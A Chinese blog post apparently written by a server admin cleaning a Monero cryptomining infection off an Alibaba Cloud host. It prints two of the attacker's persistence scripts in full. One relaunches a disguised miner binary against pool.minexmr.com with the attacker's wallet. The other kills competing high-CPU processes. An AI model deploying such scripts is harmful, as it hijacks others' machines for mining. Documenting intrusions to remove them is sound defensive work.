阿里云服务器出现入侵事件：挖矿进程-白红宇

阿里云服务器出现入侵事件：挖矿进程

阅读量：4975 次

发布时间：2019-06-12

本文共 2033 字，大约阅读时间需要 6 分钟。

1.查看进程

# ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'

找出CPU占有率高的你不认识的进程，我的是这样的

bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa

干掉它

kill -9 11110

2.全局搜索这个进程

[root@wangtianze ~]# grep -r pool.minexmr.com

.bash_history:grep -r pool.minexmr.com

.bash_history:cat daemon | grep pool.minexmr.com

.bash_history:cat deamon | grep pool.minexmr.com

.bash_history:grep -r pool.minexmr.com

.bash_history:ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid' | pool.minexmr.com

.bash_history:grep -r pool.minexmr.com

3.打开搜索到的位置

# vim /boot/grub/deamon

里面是这样的

#!/bin/bash

#daemon

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

while true;

server=`ps aux | grep 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | grep -v grep`

if [ ! "$server" ]; then

\cp -rf /boot/grub/grub.tz /usr/sbin/bashd

chmod +x /usr/sbin/bashd

cd /usr/sbin

nohup bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj -p x &

sleep 15

done

删掉里面的while循环，只保留

#!/bin/bash

#daemon

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

全局搜索

# grep -r pool.minexmr.com

同样干掉

#!/bin/bash

#disk_genius

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

while true;

ps aux --sort=%cpu |grep -v 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | awk '{if($3 > 40.0 && $NF ~//) print $2}' |xargs -i kill -9 {}

sleep 3

done

改成

#!/bin/bash

#disk_geniusi

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

再次搜索

# grep -r pool.minexmr.com

终于没了

首先找到是哪里的漏洞,设置特定IP访问

---------------------

作者：Wang_Tian_Ze